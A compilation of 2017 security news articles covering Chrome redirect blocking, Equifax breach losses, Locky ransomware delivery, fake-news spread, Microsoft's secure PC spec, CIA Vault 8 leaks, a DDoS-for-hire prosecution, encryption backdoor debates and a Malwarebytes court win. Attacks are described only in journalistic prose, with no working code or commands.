STE WILLIAMS

Changes to Google Chrome aim to prevent users from being redirected to unexpected websites and unwanted content.

Google is updating its Chrome browser to protect users from redirection to unexpected websites and unwanted content, the company announced this week.

The next few releases of Chrome will contain three new protections.

According to Google, one in every five desktop users encounter unwanted content. Many users  unexpectedly navigate to a new Web page, often the result of embedded third-party content. In Chrome 64, all redirects from third-party iframe will show a sidebar of information instead of redirecting – unless the user had been interacting with that frame.

Similarly, sometimes users click on a desired destination, which opens in a new tab, but the main window navigates to an unwanted page. In Chrome 65, this behavior will trigger an infobar and prevent the main tab from redirecting and circumventing Chrome’s pop-up blocker.

Other redirects are harder to detect; for example, when links to third-party sites are disguised as play buttons or other website controls. In early January, Chrome will update its pop-up blocker to prevent these sites from opening new windows or tabs.

Read more details here.

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/google-updates-chrome-to-prevent-unwanted-content-redirects/d/d-id/1330388?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Equifax’s 25% reduction in share value and other industry-wide stats show that consumers aren’t so apathetic about cybersecurity after all.

Many executives don’t take secondary breach costs very seriously: the numbers have long been tricky to pin down and many within the C-suite believe that consumer breach fatigue and apathy about cybersecurity buffer their brand in the wake of a breach.

But growing evidence is showing that customers really do care, and they’ll put a wallop on the brand when the circumstances are egregious enough.

This is coming crisply into focus in the wake of the Equifax breach. Yesterday the firm released its third quarter earnings results, along with estimates of primary breach costs like forensic investigation, remediation, and consumer credit reporting. The contrast between the two sets of numbers should act as an example to CEOs and board directors as to the true risk that big breaches can pose to income and business health. 

According to Equifax, breach costs are currently measuring up to approximately $87.5 million. More troubling, though, is the precipitous drop in revenue Equifax experienced in the wake of the breach.

In 2017 the credit reporting agency was flying high with huge quarterly increases in net income. First quarter saw a 25% quarter-to-quarter gain and a whopping 50% gain in revenue compared to first quarter of 2016. Second quarter saw an 8% quarterly gain and a 26% rise in net income compared to second quarter of 2016, up to $165.4 million.

Then the breach made the engines fall off – after the early September announcement, revenue plummeted to $96.3. That is an incredible 42% quarterly drop in net revenue, and a 27% drop compared to the same time period last year. And that’s just net revenue: Share value has been similarly ravaged. Since the September 7th breach announcement, the firm has lost just over a quarter of its stock valuation.

The circumstances with Equifax are different compared to mega breaches of the past, where company stock valuations have bounced back fairly quickly. The TJXs and Targets of the world primarily deal in goods and services, but Equifax’s core business is in information. Protecting it should be a core competency and customers and shareholders are ticked.

Nevertheless, this event may be still be a global bellwether that shows that consumers and shareholders have had it with all breached companies. Their antennae are up with regard to how companies deal with their private data, and they’ll change their behavior if they have evidence that companies aren’t doing what they need to protect that data.

Just this week a Gallup poll showed that two-thirds of consumers today worry about hackers stealing their financial information – nearly double the amount of those worried about having their car broken into, being burglarized, or being the victim of terrorism.

Meantime, other market data has bubbled up this year that translates that concern into real brand value impacts for companies that aren’t doing their security due diligence. A study in September by YouGov BrandIndex tracked brand scoring of a number of major brands following a mega breach in recent years. Equifax saw the most precipitous drop in brand scoring, but other companies like Anthem Blue Cross, Home Depot, and Ebay all saw attrition to their scores in the wake of a breach.

Meanwhile, earlier this year Ponemon Institute concluded that in a study of 113 companies they suffered an average 5% drop in stock value following the disclosure of their breach. The firm showed that nearly a third of consumers report terminating relationships with breached companies in the wake of the incident.

It’s a worry that CMOs and marketing directors at least recognize. Within this audience almost three-quarters say that the biggest cost of a security incident is loss of reputation and brand value. That’s way more than the fewer than half of IT leaders who would agree with that sentiment.

“Consumers and shareholders are tangibly holding companies responsible for consumer personally identifiable information (PII), and for data leaks and breaches,” says Lisa Baergen, marketing director for NuData Security, a Mastercard company. “Companies need to break past outdated notions. While internal departments debate responsibility, consumers and shareholders are holding the brand responsible – making it everyone’s problem. The tangible economic impacts of breaches will only grow.”

 

 

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.  View Full Bio

Article source: https://www.darkreading.com/informationweek-home/customers-punish-breached-companies/d/d-id/1330387?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A newly discovered strain of Locky ransomware has been discovered masquerading as legitimate Microsoft Word documents.

Another evolution of Locky ransomware is spreading through malicious attachments disguised as legitimate documents from productivity applications like Microsoft Word and Libre Office.

Researchers at Avira Virus Lab detected the ransomware earlier this week. This form of Locky has the same “.asasin” extension as a strain PhishMe picked up in October. However, it’s crafted to manipulate users with a reportedly “protected document” disguised as this:

(Image: Avira)

Users who double-click the image prompt a series of actions, which ultimately result in their files being encrypted under the “.asasin” file extension name. Multiple other files, with payment details, are written onto the disk.

Behind the image from the Word document, researchers saw a LNK file, otherwise known as a Windows shortcut. They realized the shortcut is intended to run a PowerShell script, which downloads another PowerShell script from an embedded link and runs it.

The second script connects to the Internet and downloads a Windows executable file, which includes several stages of code obfuscation and misleading data to trick victims and analysts into thinking the file is clean and from a legitimate Microsoft application.

Once it’s on the victim’s machine, the malware collects information about the operating system and sends it, encrypted, to the command-and-control server and retrieves the encryption key.

“We are seeing a rapid evolution in the way Locky is delivered,” says Brendan Griffin, threat intelligence manager and malware analyst at PhishMe. “Locky stays the same, but the delivery techniques is where we’ve really seen the most change.”

Evolution of Locky: What does it mean?

Ransomware is a growing problem for many organizations, and Locky is a common attack to watch.

“Locky has been one of the most popular malware libraries for a long time,” says John Pironti, president of IP Architects. “It has been maturing, and that doesn’t surprise me because it has been successful in financial gain.”

It’s common to see adversaries refresh and renew old approaches to see which is most effective, he continues. Attackers will slightly change their links or scripting to initiate activities to get to the same payload. The idea is to avoid detection and trick more users.

It’s “misleading” to call this recent finding a new strain of Locky, Griffin adds. The “.asasin” strain, which PhishMe also detected, is a more robust and more verbose script application delivery than other forms of Locky seen in the past. It collects basic information off the machine; nothing personally identifiable. This is the same malware arriving on a different path.

“We’ve seen people embed scripts inside of Word documents, Excel links, things like that as a way to generate code and scripts that can grab more malware packages,” Pironti says. People are more likely to open an attachment, the vector in Avira’s finding, than they are to click a link.

“We spend so much time telling people not to click links … and not nearly as much time telling them not to click attachments,” Pironti adds. Many employees click attachments all day as part of their jobs; to them, Word or Excel files aren’t as suspicious as a potentially phishy link.

He notes that the “.asasin” extension is amusing. “They want to work off fear and force people to pay,” he says.

This evolution also underscores how attackers often revert to simple techniques, Griffin adds. They’re taking advantage of the fact that phishing emails, while basic, work. “Why would they choose a really complex, sophisticated, unreliable means of delivering malware?” he says.

Defending against fake applications

Griffiin points out that this is a clear example of abuse of Microsoft’s Dynamic Data Exchange (DDE), a protocol on which Microsoft just published guidance for users.

Earlier this week, Microsoft published an advisory, following activity by Fancy Bear, which abused DDE fields to distribute malware. Microsoft is not planning to issue a patch but has provided steps for administrators to disable DDE, a protocol for transferring data between applications. If exploited, an attacker could assume control of an affected system.

Admins can turn off DDE by creating and setting registry entries for Microsoft Office based on the applications installed on the system. After this, data will no longer update automatically between applications, which could be problematic for people who rely on data feeds to update Excel. Microsoft warns doing this incorrectly could cause serious problems that would require reinstallation of the operating system.

Related Content:

• 10 Scariest Ransomware Attacks of 2017
  
• Less Than One-Third of People Use Two-Factor Authentication
• How to Make a Ransomware Payment – Fast
• Ransomware Grabs Headlines but BEC May Be a Bigger Threat
  

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Article source: https://www.darkreading.com/endpoint/new-locky-ransomware-takes-another-turn/d/d-id/1330383?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

In June, a 29-year-old man who fired a military-style assault rifle inside a popular Washington pizzeria, wrongly believing he was saving children trapped in a sex-slave ring, was sentenced to four years in prison.

The judge said at the time that it was “sheer luck” that Edgar Maddison Welch didn’t kill anybody. But it wasn’t luck that planted the so-called “PizzaGate” conspiracy theory in his head: we can credit a particularly dark corner of 4chan for that.

It started with hacked emails on WikiLeaks… which got scoured for political wrongdoing in the Clinton campaign staff by a popular Reddit forum dedicated to Donald J. Trump and 4chan’s far-right fringe message board… and which wound up confabulated into PizzaGate by somebody on 4chan who connected the phrase “cheese pizza” to pedophiles, who use the initials “c.p.” to denote child pornography on chat boards.

PizzaGate is only one of a long lineage of fake news spawned on 4chan’s message boards. Reading the output of what the Guardian once dubbed the “lunatic, juvenile, brilliant, ridiculous and alarming” 4chan community can melt your brain.

But you’ve got to hand it to them: the site that persuaded web users to microwave their iPhones has always been good at clogging up the internet with its memetic fatbergs.

In fact, alt-right communities within 4chan and Reddit are veritable hatcheries from which crawl a surprisingly large number of the headlines that eventually infest Twitter.

That’s the finding of a study from the University of Alabama at Birmingham, Cyprus University of Technology, University College London and Telefonica Research.

The results of the study were published last week in a paper at the ACM Internet Measurement Conference in London.

The researchers studied mainstream and “alternative” news shared on Twitter, Reddit and 4chan, with the aim of finding out how “misleading, false, or agenda-driven information” spreads online, leaving swathes of duped people in its wake. They analyzed millions of posts to measure how mainstream and alternative news flows between those platforms.

The researchers found that tightly knit, highly active fringe communities are an important part of our current news ecosystem and often succeed in spreading alternative news to mainstream social networks and the greater web.

This is the first large-scale measurement of how mainstream and alternative news flows through multiple social media platforms. The paper focuses on Twitter, 4chan and Reddit because in spite of their differences, all three are generally accepted as being drivers of substantial portions of the online world; because of anecdotal evidence that specific sub-communities within Reddit and 4chan act as incubators of fake news; and because all three have a big impact on people’s opinions and actions when they spread fake news.

One of the researchers, Jeremy Blackburn, assistant professor of computer science in the UAB College of Arts and Sciences, told Phys.org that the smaller, fringe communities on Reddit and 4chan are where many alternative news pieces incubate before spreading to mainstream platforms:

The content and talking points are refined until they finally break free and make it to larger, more mainstream communities.

The researchers analyzed more than 400,000 tweets, 1.8 million posts and comments on Reddit, and 97,000 posts and replies on 4chan that contain URLs from 99 news sites. The data sets covered activity on the three platforms between 30 June 2016 and 28 February 2017, with a few gaps due to web crawler failure.

Using a mathematical technique called the Hawkes process, the team of researchers measured the influence of six subreddits: “The_Donald,” “politics,” “worldnews,” “AskReddit,” “conspiracy,” and “news.” They also measured the “/pol/” board on 4chan (the site’s Politically Incorrect board) and Twitter: a platform that they said is a major influence on the posting of URLs from alternative news sites on other social platforms.

In fact, Twitter has a greater effect on spreading alternative news than it does on spreading mainstream news stories.

What does this all add up to? Well, that it’s a two-way street. Just as Twitter to a large degree influences the alternative news URLs that wind up on other platforms, such as Facebook, the alternative URL producers also feed Twitter.

The biggest alternative “news” sources that spread their URLs to Twitter are The_Donald subreddit – mostly a community of Donald Trump supporters – and 4chan’s /pol/ board, which is known for being stuffed with hate speech and racism.

The researchers note that they only looked at a closed system of eight platforms and subreddits, but it’s clear that Twitter is “undoubtedly effective at propagating information.”

If fervent groups on 4chan and Reddit succeed in getting their URLs picked up on Twitter they can be disseminated far and wide. The tiny size of communities like the alt-right nooks and crannies of /pol/ and The_Donald are belied by their outsized influence, in other words:

The influence these two communities have on Twitter is likely to have a disproportional impact on the greater Web compared to their relatively minuscule userbase.

What are we supposed to do about all this? There is little to nothing stopping sites from disseminating disinformation. Publishing is as cheap as the air that Wi-Fi slices through. Too bad that the consequences of outrageous fabrications aren’t as ethereal.

There is nothing ethereal about a deluded man with an assault rifle.

But at least understanding how fake news is born (or where, as in the case of the recently revealed Russian troll farm) is a start. The researchers plan to keep going, with their next target being to explore advanced image recognition techniques to look for screenshots shared among the different platforms, as well as Natural Language Processing methods to determine whether stories become a part of the platform’s narrative of events.

They believe that understanding how these alternative news sources influence online platforms can help in efforts to detect, and to mitigate, misleading information. Agenda-driven information. False information. Fake news. Conspiracies. Nonsense spun out of stolen conversations about cheese pizza baked in minds with overheated imaginations.

Godspeed, researchers, godspeed.

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Z835bEmTlRE/

This week, Microsoft said something about PCs it has never clearly said before: it spelled out a hardware specification it thinks PC makers should adopt to ensure their Windows computers are “highly secure”.

That might not sound terribly dramatic, but in the understated Microsoft way it signals an important change.

Up to now, and for as long as anyone can remember, the only aspect of hardware Microsoft (and almost everyone else in the industry) cared about was how fast the components inside a PC were.

Under this model, securing the PC was a job done by the OS itself and dedicated applications running on top of it, which was largely independent of how the computer was made.

No longer – increasingly security is being baked in at a lower level and that means doing it in a mixture of hardware tightly integrated with secure firmware.

Reading the specs, you notice that performance isn’t off the menu completely.

A secure PC should run 64-bit Intel or AMD 7^th-generation processors (Skylake or A-Series/Athlon onwards) on 8GB of RAM. At first it looks as if this might be something to do with hardware virtualisation (also in the spec) but is really more tied up with the code and memory-protection mechanisms built into these chips as Virtualisation Based Security (VBS).

And it doesn’t stop with the processor as the system’s other chipsets must support specific types of memory and virtualisation management too.

Unsurprisingly, systems must ship with a TCG v2.0 Trusted Platform Module (TPM) and implement verified boot using something like Intel’s Boot Guard.

Critically, what used to be called BIOS firmware must meet the latest standards from UEFI 2.4 or later, and be able to resist tampering while supporting updating.

I’ll spare you the rest of the spec’s gory detail and skip to the ‘what it all means’ bit…

The first thing that it shows is that securing PCs is increasingly a job that’s done (or at least begun) in the first few seconds after it’s turned on, when the system checks to see that important software hasn’t been interfered with.

This isn’t brand new, of course, but it is increasingly central to defending PCs, not simply the main UEFI layer and its various functions but also the other hidden firmware that might be present in the computer (remember the suspected low-level hacking of hard drives?). It also needs to be managed when vulnerabilities are exposed.

Secondly, we learn something about the future, specifically how things like Mode Based Execution Control (MBEC) might soon be used to boost Windows Defender Application Guard (WDAG), a Hyper‑V virtualization isolation layer used by, among other things, the Edge browser.

This is only available for enterprise customers today but the spec hints that this will change at some point to include everyone.

Which brings us to the version of Windows that fully enables WDAG, namely Windows 10 version 1709, Fall Creators Update (released in mid-October), the Windows version that Microsoft’s new spec assumes as a sort of reference year zero.

Is all this a lot to ask?

If you don’t have a PC that meets these requirements – and almost everyone who bought a PC or laptop before last year won’t – it might seem so.

There will also be cynics who suspect that PC companies will use it to harry people into upgrading their PCs more often.

Then there are convenient exceptions such as the strange beast that is Windows 10 S, the cut-down Chromebook-like-but-not-quite computer, that isn’t required to meet the spec because, frankly, it can’t.

Nonetheless, corporate buyers will pay close attention to the new spec and it could even end up buried inside compliance regimes, in time.

If that happens, Microsoft’s spec will end up being a two-minute read with two-decade implications.

Follow @NakedSecurity
Follow @JohnEDunn

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/NfqZj_8TjFU/

The CIA wrote code to impersonate Kaspersky Labs in order to more easily siphon off sensitive data from hack targets, according to leaked intel released by Wikileaks on Thursday.

Forged digital certificates were reportedly used to “authenticate” malicious implants developed by the CIA. Wikileaks said:

Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities. The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow pretending to be signed by Thawte Premium Server CA, Cape Town. In this way, if the target organization looks at the network traffic coming out of its network, it is likely to misattribute the CIA exfiltration of data to uninvolved entities whose identities have been impersonated.

Eugene Kaspersky, chief exec of Kaspersky Lab, sought to reassure customers. “We’ve investigated the Vault 8 report and confirm the certificates in our name are fake. Our customers, private keys and services are safe and unaffected,” he said.

Hackers are increasingly abusing digital certs to smuggle malware past security scanners. Malware-slinging miscreants may not even need to control a code-signing certificate. Security researchers from the University of Maryland found that simply copying an authenticode signature from a legitimate file to a known malware sample – which results in an invalid signature – can result in antivirus products failing to detect it.

Independent experts reckon the CIA used Kaspersky because it’s a widely known vendor.

Martijn Grooten, security researcher and editor of industry journal Virus Bulletin, said: “The CIA needed a client certificate to authenticate its CC comms, couldn’t link it to CIA and used ‘Kaspersky’, probably just because they needed a widely used name. No CA hacking or crypto breaking involved. Clever stuff, but not shocking. Not targeted against Kaspersky.”

Revelations about the abuse of digital certificates by the US spy agency came as Wikileaks released CIA source code and logs for a malware control system called Hive, as previously reported.

Security expert Professor Alan Woodward criticised the release with a reference to the Equation Group (NSA hacking unit)/Shadow Brokers leak. “Wikileaks is now releasing source for exploits in Vault 7. Do they remember what happened last time such exploit code was leaked? Standby for another WannaCry.” ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/10/cia_kaspersky_fake_certs_ploy/

US federal prosecutors in Minnesota have charged a 46-year-old man with hiring a cyberhitman – well, technically, three hacking services – to launch a year-long campaign of distributed denial of service (DDoS) attacks on his former employer.

Prosecutors say that John Kelsey Gammell, 46, contacted seven DDoS services and paid monthly subscriptions to three of them in order to bring down Washburn Computer Group, a point-of-sale system repair company in Monticello, Minnesota. Between July 2015 and September 2016, Gammell also allegedly used the services to go after a slew of other targets, including the networks of the Minnesota Judicial Branch, Hennepin County, several banks and a few employment contracting companies he worked at.

According to the Star Tribune, Gammell rejected a plea deal when he appeared in a Minneapolis court last week. The deal would have resolved all charges and capped his possible prison sentence at a mandatory 15 to 17 years. The newspaper reports that a federal magistrate is reviewing motions to dismiss the case or suppress evidence.

In a criminal complaint filed in April 2017, FBI Special Agent Brian Behm said in a sworn affidavit that when Washburn first began experiencing shutdowns of multiple websites, server log files weren’t any help in finding the culprit. That’s because the IP addresses connected to the DDoS attack led back to a US-based virtual private network (VPN) that anonymized the true source of incoming internet access. Like many anonymizing services, the VPN didn’t maintain logging information to show who was using it, Behm explained.

But two taunting emails asking Washburn if the company had any “ongoing IT issues” that they needed help with – sent while the DDoS attacks were ongoing – were a whole lot easier to track. Google and Yahoo, both under grand jury subpoenas, coughed up the IP addresses associated with the email accounts that sent the jeers, which were accompanied by the image of a laughing mouse. The FBI says that the Gmail account and the Yahoo account that sent the messages were created with an IP address associated with Gammell’s home address and an ATT cellphone number that pointed to Gammell as the subscriber.

A search warrant served on Google showed that between May 2015 and September 2016, Gammell allegedly showed interest in, or made purchases at, seven DDoS-for-hire sites: also known as “booters” or “stressers,” these sites sell monthly subscription fees for buyers to target DDoS attacks against IP addresses or websites of their choosing. You get what you pay for: the premium plans boost the duration and intensity of the attack.

Based on emails, Gammell allegedly had three favorite cyber goon squad services: cStress, vDOS and booter.xyz. Prosecutors say he shelled out about $235 to cstress.net, ranging from the basic “All Included” $19.99 service to the “Premium” service at $39.99. His monthly payments to the services went as high as $199.

cstress.net is offline, but Behm says he found an archived main page that shows that the “Premium” package could be used to “Stress Large Servers and Websites,” that it was capable of “Full Hour Stresses,” and that it provided “30Gbps of Dedicated Bandwidth” and “Unlimited Boots.”

For a criminal enterprise, it was all very cordial, all very professional. Behm says he found an email thanking Gammell for his purchase from another DDoS-for-hire service called inboot. In upgrading to “diamond” monthly membership at booter.xyz, Gammell allegedly praised the service and told his correspondent that he recommends it to others.

Why the persistence, and money spent, in allegedly plaguing a former employer? According to the criminal complaint, Gammell had worked at Washburn for 17 years and had left, under good terms, three and a half years ago. But a dispute boiled up over payment for training services Gammell had provided after he left the company.

According to the Star Tribune, Gammell’s attorney, Rachel Paulose, has argued that it wasn’t Gammell that attacked Washburn. No, it was the “cyberhit men,” she said: why not go after them?

The government has failed to charge a single one of those ‘cyberhitmen’ services, named and evidently well known to the government. Instead the government’s neglect has allowed the professional cyberhitmen for hire to skip off merrily into the night.

Funny thing about that: skipping off merrily into the night doesn’t exactly describe what happened to at least one of Gammell’s purported favorite hitmen services. “Getting busted by Israeli police” is more like it. Back in September 2016, two Israeli teenagers – the co-owners behind vDOS – had their service taken down by a massive hack, and the two 18-year-old men were arrested.

And all the evidence the FBI got from a known security researcher about vDOS? Toss it, Paulose says: the data could have been obtained through hacking.

The Washburn attacks were “essentially a prank on a dormant site not doing business,” she said.

The Star Tribune quoted this comeback from Assistant U.S. Attorney Timothy Rank:

Even if Mr. Gammell thinks it’s a prank, it’s a criminal prank.

Gammell is facing a charge of  “knowingly [causing] the transmission of a program, information, code, or command, and as a result of such conduct, intentionally [causing] damage without authorization, to a protected computer.”

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/QB6YcQLuz5s/

While US President Donald Trump thinks it’s too early to discuss gun control in the wake of Sunday’s Texas church massacre – America’s latest mass shooting – his Deputy Attorney General Rod Rosenstein is just fine exploiting the murder-suicide of 26 people to push for backdoors.

Specifically, a backdoor so investigators can forcibly and easily unlock devices, decrypting and presenting the information they contain on demand.

Speaking at a breakfast meeting with biz leaders in Linthicum, Maryland, Rosenstein said the FBI had the shooter’s phone, understood to be an iPhone, in their possession but were unable to unlock it to view the contents. Preventing agents from accessing devices in criminal investigations should not be allowed, he argued.

“No reasonable person questions our right, and obligation, to access the phone,” Rosenstein said today.

“But the company that built it purposely designed the operating system so that we cannot access it. Maybe we will find a way to get into that phone, as we did in the San Bernardino case, but it’s going to cost a great deal of time and money, and in some cases it costs us lives. We need to find a solution to deal with warrant-proof encryption.”

In other words, Rosenstein wants to avoid the previous court battles with moneybags Apple, and just lean on the iGiant hard enough to make it unlock the killer’s cellphone. Right now is not a good time for tech giants, given all the headlines of fake news and Russian-bought political ads that Apple has largely distanced itself from but is still tarnished by it simply by being another rich Silicon Valley beast.

Meanwhile, Apple has said it offered to help the Feds in researching the case before the agency even approached Cupertino. The iGiant also kindly offered to throw its lawyers at any legal demand from the FBI as fast as it could to get the whole thing over and done with as soon as possible.

“Our team immediately reached out to the FBI after learning from their press conference that investigators were trying to access a mobile phone,” Apple said in a statement to journalists.

“We offered assistance and said we would expedite our response to any legal process they send to us. We work with law enforcement every day. We offer training to thousands of agents so they understand our devices and how they can quickly request information from Apple.”

Pattern of incompetence

If the iPhone is a recent one, the FBI could have unlocked the dead murderer’s handset using his finger, if the phone was set up to accept fingerprint logins. Assuming the device had a suitably configured fingerprint sensor, FBI had a 48-hour window to use the prints to unlock the mobe. After that time period, a passcode is required which they don’t have. The fact the Feds only started complaining about not being able to access the phone two days after the mass shooting indicates that either the phone didn’t use fingerprint locking or agents missed their chance.

It was a similar story with the case of the San Bernardino shooter. There, hours after the shooting, the killer’s employer – working local FBI agents – changed his iCloud password. This gave them access to his backups, but locked them out of getting further data from the phone. Apple argued it couldn’t easily unlock the handset due to the encryption system used, and in any case, was unwilling to be forced into producing software tools for the US government to break into devices on demand.

The FBI has almost 7,000 phones in its possession that it can’t get into. You have to wonder why it, and Rosenstein, always chooses the terrorist cases to push their argument that Uncle Sam needs backdoor access to encrypted communications and data at rest.

They also never mention that the best minds in the field of cryptography have repeatedly stated that it is mathematically impossible to introduce a backdoor that’s only accessible by crime investigators into a truly end-to-end secure system: someone else will find the back passage and abuse it to decrypt people’s stuff. The NSA agrees, probably because it knows that if a backdoor were mandated the Russians and Chinese would make it a priority to find and exploit it.

But that’s not going to stop Rosenstein and the FBI from their endless crusade to bork encryption, even if it means exploiting the murder of American citizens. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/us_government_texas_shooting_iphone_backdoor/

WikiLeaks has shoved online more internal classified stuff nicked from the CIA – this time what’s said to be the source code for spyware used by Uncle Sam to infect and snoop on targets’ computers and devices.

Today’s code dump is part of a larger collection called Vault 8, and spills onto the internet what is claimed to be the CIA’s Hive tool. This is two-part component: one half runs on a snoop-controlled server and issues commands to the client, the other half, which lurks quietly on an infected device or computer.

How exactly the client side of the malware gets into the endpoints to do its spying isn’t revealed: there are no exploits for vulnerabilities in the code, nor any zero days uncovered, it appears. It’s a remote-control tool that sheds light on the CIA’s programming abilities – and the C code is pleasantly clean from our glance through it – and handily lays out a way to perform server-client operations. A free US taxpayer-funded programming tutorial, if you will.

The software could be used by miscreants to build functionality into their own software nasties, however, there are tons of other examples out there they could crib from, so today’s dump isn’t exactly arming crooks with powerful cyber-weapons. It’s just embarrassing for the CIA, if the code is indeed the agency’s classified blueprints.

WikiLeaks doc dump reveals CIA tools for infecting air-gapped PCs

READ MORE

The spyware is designed to be installed on ARM, MIPS, PowerPC and x86 devices powered by Linux, particularly routers and internet-connected cameras from Mikrokit and AVTech. It communicates via encrypted SSL/TLS connections to a remote server. That server appears to be serving a normal website to passing visitors, but the implanted malware uses a HTTPS feature called optional client authentication to access secret areas where it can receive instructions to execute. The client can be instructed to download or upload files, delete documents, and run commands.

Agents would ensure the malware is not traced back to them: the server should run in a throwaway virtual machine, and be dressed up to look like an innocent dull site. The HTTPS connections are established using security certificates that appear to belong to antivirus maker Kaspersky Lab, allegedly. Spies would be expected to connect to the control servers via a web of VPNs, proxies and other cover servers.

“Even the most sophisticated malware implant on a target computer is useless if there is no way for it to communicate with its operators in a secure manner that does not draw attention,” the Julian-Assange-led WikiLeaks said of the software.

“Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet.”

No actual executables are included, so you would have to build the programs yourself. The software’s operation is described here, and the version leaked this week dates between August 2013 and October 2015, apparently.

“The cover domain delivers ‘innocent’ content if somebody browses it by chance. A visitor will not suspect that it is anything else but a normal website,” WikiLeaks claimed.

“The only peculiarity is not visible to non-technical users – a HTTPS server option that is not widely used: Optional Client Authentication. But Hive uses the uncommon Optional Client Authentication so that the user browsing the website is not required to authenticate – it is optional.”

The Vault 8 dump is the latest attempt by WikiLeaks to shed light on the CIA’s covert online operations. Previous leaks have included details on the American government’s use of forensics tools, zero-day exploits, and infection techniques. The spying agency declined to comment. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/wikileaks_cia_spyware/

Security software slinger Enigma has lost a key legal battle against antivirus maker Malwarebytes, which blocks and deletes Enigma’s products from PCs.

Florida-based Enigma Software Group, which touts tools Spyhunter and RegHunter that claim to remove software nasties from Windows computers, sued Malwarebytes in San Jose, California, claiming, among other things, tortious interference with its business. At the heart of the matter was Enigma’s fury at having its code labeled a “potentially unwanted program” by Malwarebytes, leading to its automatic quarantining and deletion by the latter’s antivirus scanner.

Enigma claimed Malwarebytes’ decision to rid PCs of its gear was a malicious act, arguing its software wasn’t a legitimate threat to computer users. It claimed Malwarebytes’ blockade was a retaliatory strike after Enigma sued a tech support blog that published a bad review of Spyhunter and was affiliated with Malwarebytes.

This week, District Judge Edward Davila dismissed Enigma’s case against Malwarebytes, citing the 2009 ruling of Zango v Kaspersky which bore striking similarities to this legal bout. Then, as now, the courts sided with security companies as having a legitimate defense under the Communications Decency Act.

“The reality is that this is not only a critical win for Malwarebytes, but for all security providers who will continue to have legal protection to do what is right for their users,” said Marcin Kleczynski, CEO of Malwarebytes, on Thursday. “This decision affirms our right to enable users by giving them a choice on what belongs on their machines and what doesn’t.”

Enigma’s Spyhunter has garnered mixed reviews because it’s a free malware scanner that charges a subscription fee if you want to remove any nasties it finds. Some users have also reported that it is difficult to remove once installed.

Enigma plans to appeal the ruling. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/10/malwarebytes_enigma/